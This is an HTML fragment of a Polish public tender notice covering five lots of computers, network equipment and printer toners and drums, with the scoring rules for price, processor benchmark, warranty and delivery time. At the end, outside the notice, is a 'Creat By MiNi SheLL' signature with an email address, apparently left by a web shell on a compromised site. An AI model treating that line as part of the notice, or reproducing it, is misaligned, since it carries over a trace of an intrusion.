              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Wykonawca zobowiązany jest do złożenia wyłącznie aktualnych na dzień składania ofert następujących oświadczeń i dokumentów: 
1) Formularz od nr 1 do nr 5- Oferta cenowa dla Części od nr I do V.
2) Formularz nr 6-  Oświadczenie z art. 25 a ust. 1 Pzp- podstawy wykluczenia.
3) Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. Tylko w sytuacjach określonych w Rozdziale X pkt 4 i 5 lub w przypadku składania oferty wspólnej.- jeżeli dotyczy.

Zamawiający za ofertę najkorzystniejszą danej Części uznana ofertę, która uzyska łącznie najwyższą liczbę punktów obliczoną według następującego wzoru:

Pkońc. = liczba punktów w kryterium I tj. Cena + liczba punktów w kryterium nr II dla danej Części
gdzie:
Pkońc.  Punktacja końcowa

</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>RPO/ POWER<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa 10 kompletów komputerów stacjonarnych wraz z oprogramowaniem<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30200000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60.00</td></tr><tr><td>Procesor</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Cena  60 % 
Oferta z najniższą zaoferowaną ceną za wykonanie całego przedmiotu zamówienia, otrzyma 60 pkt. Pozostałe oferty otrzymają punkty zgodnie z wyliczeniem wg wzoru:
Wartość punktowa = 60 x (Cmin/Cb)
gdzie: 
Cmin - najniższa cena spośród złożonych ofert, 
Cb - cena oferty badanej. 
Ocena oferty odbywać się będzie na podstawie złożonej w Ofercie cenowej na Formularzu nr 1 do SIWZ.
Procesor   40 %
Sposób przyznania punktów w kryterium procesor. Za dostawę procesora oferowanego 
w komputerach stacjonarnych, osiągającego w teście Performance Test (CPU Mark) wynik określony wg poniższych Grup, zostaną przyznane punkty w następujący sposób: 
1) Grupa A: 4000 pkt  5000 pkt. - 0 pkt, 
2) Grupa B: 5001 pkt  6000 pkt. - 20 pkt,
3) Grupa C: 6001 pkt i więcej - 40 pkt. 

Minimalny wynik osiągany przez procesor w komputerach stacjonarnych  w teście Performance Test (CPU Mark) wymagany przez Zamawiającego wynosi 4 000 pkt. 

Jeżeli Wykonawca zaproponuje wynik mniejszy niż minimalny wymagany przez Zamawiającego, oferta zostanie odrzucona jako niezgodna z SIWZ. Jeżeli Wykonawca zaproponuje wynik osiągany przez procesor w komputerach stacjonarnych w teście Performance Test (CPU Mark)  wyższy niż 6001 pkt, do oceny ofert w kryterium procesor zostanie przyjęty wynik 6001 pkt, czyli maksymalny przyjęty przez Zamawiającego. 
W celu uzyskania dodatkowych punktów w tym kryterium, Wykonawca może zaproponować tylko jeden rodzaj procesora dla wszystkich urządzeń. 
Wykonawca może otrzymać w kryterium procesor maksymalnie 40 pkt. 
Ocena w zakresie tego kryterium zostanie dokonana na podstawie wypełnionego Formularza nr 1 i złożonej w nim deklaracji Wykonawcy. Maksymalna liczba punktów, która może zostać przyznana Wykonawcy w ocenie ww. kryterium wynosi 40 pkt.

UWAGA!!! Wynik testu zaproponowanego procesora do wszystkich urządzeń musi być dostarczony przed zawarciem umowy, (jako warunek zawarcia umowy) potwierdzający, że dany procesor mieści się w/w skali punktowej, dla poszczególnej grupy, tj. Grupa A, B i/ lub C, zgodnie z zapisami Rozdział XV pkt 10, tj. formalności przed zawarciem umowy. 

Wykonawca otrzyma bezwzględnie 0 punktów bez stosowania powyższej skali w sytuacji:
	gdy Wykonawca nie wykaże żadnej liczby punktów w teście Performance Test (CPU Mark). Zamawiający, tym samym uzna, że Wykonawca oferuje procesor o min. 4000 pkt w teście Performance Test (CPU Mark).
<br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>RPO<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa asortymentu: Przełącznik sieciowy- szt. 4 , Kabel 10-Gigabit o długości 10m do połączenia przełączników- szt. 1, Listwa Antyprzepięciowa- szt. 2, Taśma LTO-4 1.6TB- szt. 4<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30236000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60.00</td></tr><tr><td>Termin gwarancji</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Cena  60 % 
Oferta z najniższą zaoferowaną ceną za wykonanie całego przedmiotu zamówienia, otrzyma 60 pkt. Pozostałe oferty otrzymają punkty zgodnie z wyliczeniem wg wzoru:
Wartość punktowa = 60 x (Cmin/Cb)
gdzie: 
Cmin - najniższa cena spośród złożonych ofert, 
Cb - cena oferty badanej. 
Ocena oferty odbywać się będzie na podstawie złożonej w Ofercie cenowej na Formularzu nr 2 do SIWZ.
Termin gwarancji: max. 40 %.
Punkty za w/w kryterium zostaną przyznane w skali punktowej do 40 pkt. w oparciu o poniższe zestawienie:
a) Termin gwarancji: do 48 mc-y i więcej * - 40 pkt.
b) Termin gwarancji: od 36 mc-y do 47 mc-y- 20 pkt.
c) Termin gwarancji: od 25 mc-y do 35 mc-y- 10 pkt.
d) Termin gwarancji: do 24 mc-y- 0 pkt.

* W przypadku zaoferowania dłuższej gwarancji niż okres 48 mc-y, do oceny ofert w/w kryterium, zostanie przyjęty okres 48 mc-y, czyli maksymalny przyjęty przez Zamawiającego.

Ocena w zakresie tego kryterium zostanie dokonana na podstawie wypełnionego Formularza nr 2 i złożonej w nim deklaracji Wykonawcy. Maksymalna liczba punktów, która może zostać przyznana Wykonawcy w ocenie ww. kryterium wynosi 40 pkt.

Wykonawca otrzyma bezwzględnie 0 punktów bez stosowania powyższej skali w sytuacji:
	gdy Wykonawca nie wykaże terminu gwarancji w Formularzu oferty cenowej. Zamawiający, tym samym uzna, że Wykonawca oferuje termin gwarancji jako minimalny okres 24 mc-y.
<br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>FP<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa materiałów eksploatacyjnych
Model urządzeń	Rodzaj materiału 
eksploatacyjnego	Wydajność 
w stronach*	Ilość szt.
Lexmark MS410DN	Toner czarny	10 000, szt.	10;
Lexmark MS410DN	Bęben	60 000, szt.	5;
Lexmark CS310dn	Toner czarny	4 000, szt.	5;
HP LaserJet 1200	Toner czarny	3 500, szt.	6;
HP LaserJet M1522n	Toner czarny	2 000, szt.	14;
HP LaserJet M401dn	Toner czarny	6 900	, szt.20;
Lexmark E360dn	Toner czarny	9 000	, szt. 5;
Lexmark E360dn	Bęben czarny	30 000	2;
HP LaserJet 1320	Toner czarny	6 000, szt.20;
HP LaserJet P2015	Toner czarny	7 000, szt.20;
Konica Minolta Bizhub C224e	Bęben kolor	55 000, szt. 2;
*wydajność deklarowana zalecanego materiału eksploatacyjnego przez producenta urządzenia.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30125110-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 11<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>50.00</td></tr><tr><td>Termin dostawy</td><td>50.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Cena  50 % 
Oferta z najniższą zaoferowaną ceną za wykonanie całego przedmiotu zamówienia, otrzyma 50 pkt. Pozostałe oferty otrzymają punkty zgodnie z wyliczeniem wg wzoru:
Wartość punktowa = 50 x (Cmin/Cb)
gdzie: 
Cmin - najniższa cena spośród złożonych ofert, 
Cb - cena oferty badanej. 
Ocena oferty odbywać się będzie na podstawie złożonej w Ofercie cenowej na Formularzu nr 3 do SIWZ. 

Termin dostawy: max 50 %
Punkty za w/w kryterium zostaną przyznane w skali punktowej do 50 pkt. w oparciu o poniższe zestawienie: 
- dostawa wszystkich materiałów w żądanym zakresie w ciągu do 3 dni kalendarzowych od dnia zawarcia umowy- 50,00 pkt.,
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 4 do 5 dni kalendarzowych od dnia zawarcia umowy- 30,00 pkt., 
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 6 do 8 dni kalendarzowych, od dnia zawarcia umowy- 10,00 pkt.,
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 9 i więcej* dni kalendarzowych, od dnia zawarcia umowy- 00 pkt.
* Maksymalny termin wykonania zamówienia może wynieść do 11 dni kalendarzowych od dnia zawarcia umowy.

Ocena w zakresie tego kryterium zostanie dokonana na podstawie wypełnionego Formularza nr 3 i złożonej w nim deklaracji Wykonawcy poprzez wskazanie terminu dostawy przedmiotu zmatowienia od dnia zawarcia umowy. Maksymalna liczba punktów, która może zostać przyznana Wykonawcy w ocenie ww. kryterium wynosi 50 pkt.

Wykonawca otrzyma bezwzględnie 0 punktów bez stosowania powyższej skali w sytuacji:
gdy Wykonawca nie wykaże ilości dni dostawy przedmiotu zamówienia. W takim przypadku, Zamawiający uzna, że Wykonawca zrealizuje przedmiotu umowy w maksymalny terminie, tj. do 11 dni kalendarzowych od dnia zawarcia umowy.

<br /></div></div><br /></div><div><b>Część nr: </b>IV
                  
                <b>Nazwa: </b>FGŚP<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa materiałów eksploatacyjnych:
Model urządzeń	Rodzaj materiału 
eksploatacyjnego	Minimalna wydajność 
w stronach*	Ilość szt.
Lexmark MS410DN	Toner czarny	10 000	, szt.5;
Lexmark MS410DN	Bęben	60 000, szt.5;
Kyocera Ecosys P2135dn	Toner czarny	7 200, szt.7.

*wydajność deklarowana zalecanego materiału eksploatacyjnego przez producenta urządzenia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30125110-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 11<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>50.00</td></tr><tr><td>Termin dostawy</td><td>50.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Cena  50 % 
Oferta z najniższą zaoferowaną ceną za wykonanie całego przedmiotu zamówienia, otrzyma 50 pkt. Pozostałe oferty otrzymają punkty zgodnie z wyliczeniem wg wzoru:
Wartość punktowa = 50 x (Cmin/Cb)
gdzie: 
Cmin - najniższa cena spośród złożonych ofert, 
Cb - cena oferty badanej. 
Ocena oferty odbywać się będzie na podstawie złożonej w Ofercie cenowej na Formularzu nr 4 do SIWZ. 

Termin dostawy: max 50 %
Punkty za w/w kryterium zostaną przyznane w skali punktowej do 50 pkt. w oparciu o poniższe zestawienie: 
- dostawa wszystkich materiałów w żądanym zakresie w ciągu do 3 dni kalendarzowych od dnia zawarcia umowy- 50,00 pkt.,
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 4 do 5 dni kalendarzowych od dnia zawarcia umowy- 30,00 pkt., 
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 6 do 8 dni kalendarzowych, od dnia zawarcia umowy- 10,00 pkt.,
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 9 i więcej* dni kalendarzowych, od dnia zawarcia umowy- 00 pkt.
* Maksymalny termin wykonania zamówienia może wynieść do 11 dni kalendarzowych od dnia zawarcia umowy.

Ocena w zakresie tego kryterium zostanie dokonana na podstawie wypełnionego Formularza  4 i złożonej w nim deklaracji Wykonawcy poprzez wskazanie terminu dostawy przedmiotu zmatowienia od dnia zawarcia umowy. Maksymalna liczba punktów, która może zostać przyznana Wykonawcy w ocenie ww. kryterium wynosi 50 pkt.

Wykonawca otrzyma bezwzględnie 0 punktów bez stosowania powyższej skali w sytuacji:
gdy Wykonawca nie wykaże ilości dni dostawy przedmiotu zamówienia. W takim przypadku, Zamawiający uzna, że Wykonawca zrealizuje przedmiotu umowy w maksymalny terminie, tj. do 11 dni kalendarzowych od dnia zawarcia umowy.
<br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>RPO/ POWER<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa materiałów eksploatacyjnych:
Model urządzeń	Rodzaj materiału 
eksploatacyjnego	Minimalna wydajność 
w stronach*	Ilość szt.
HP LaserJet P2055dn	Toner czarny	6 500, szt.25;
HP LaserJet M401dn	Toner czarny	6 900, szt.5;
HP LaserJet 1320	Toner czarny	6 000, szt.5;
HP LaserJet P2015	Toner czarny	7 000, szt.10.

* wydajność deklarowana zalecanego materiału eksploatacyjnego przez producenta urządzenia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30125110-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 11<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>50.00</td></tr><tr><td>Termin dostawy</td><td>50.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Cena  50 % 
Oferta z najniższą zaoferowaną ceną za wykonanie całego przedmiotu zamówienia, otrzyma 50 pkt. Pozostałe oferty otrzymają punkty zgodnie z wyliczeniem wg wzoru:
Wartość punktowa = 50 x (Cmin/Cb)
gdzie: 
Cmin - najniższa cena spośród złożonych ofert, 
Cb - cena oferty badanej. 
Ocena oferty odbywać się będzie na podstawie złożonej w Ofercie cenowej na Formularzu nr 5 do SIWZ. 

Termin dostawy: max 50 %
Punkty za w/w kryterium zostaną przyznane w skali punktowej do 50 pkt. w oparciu o poniższe zestawienie: 
- dostawa wszystkich materiałów w żądanym zakresie w ciągu do 3 dni kalendarzowych od dnia zawarcia umowy- 50,00 pkt.,
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 4 do 5 dni kalendarzowych od dnia zawarcia umowy- 30,00 pkt., 
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 6 do 8 dni kalendarzowych, od dnia zawarcia umowy- 10,00 pkt.,
- dostawa wszystkich materiałów w żądanym zakresie w ciągu od 9 i więcej* dni kalendarzowych, od dnia zawarcia umowy- 00 pkt.
* Maksymalny termin wykonania zamówienia może wynieść do 11 dni kalendarzowych od dnia zawarcia umowy.

Ocena w zakresie tego kryterium zostanie dokonana na podstawie wypełnionego Formularza nr 5 i złożonej w nim deklaracji Wykonawcy poprzez wskazanie terminu dostawy przedmiotu zmatowienia od dnia zawarcia umowy. Maksymalna liczba punktów, która może zostać przyznana Wykonawcy w ocenie ww. kryterium wynosi 50 pkt.

Wykonawca otrzyma bezwzględnie 0 punktów bez stosowania powyższej skali w sytuacji:
gdy Wykonawca nie wykaże ilości dni dostawy przedmiotu zamówienia. W takim przypadku, Zamawiający uzna, że Wykonawca zrealizuje przedmiotu umowy w maksymalny terminie, tj. do 11 dni kalendarzowych od dnia zawarcia umowy.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com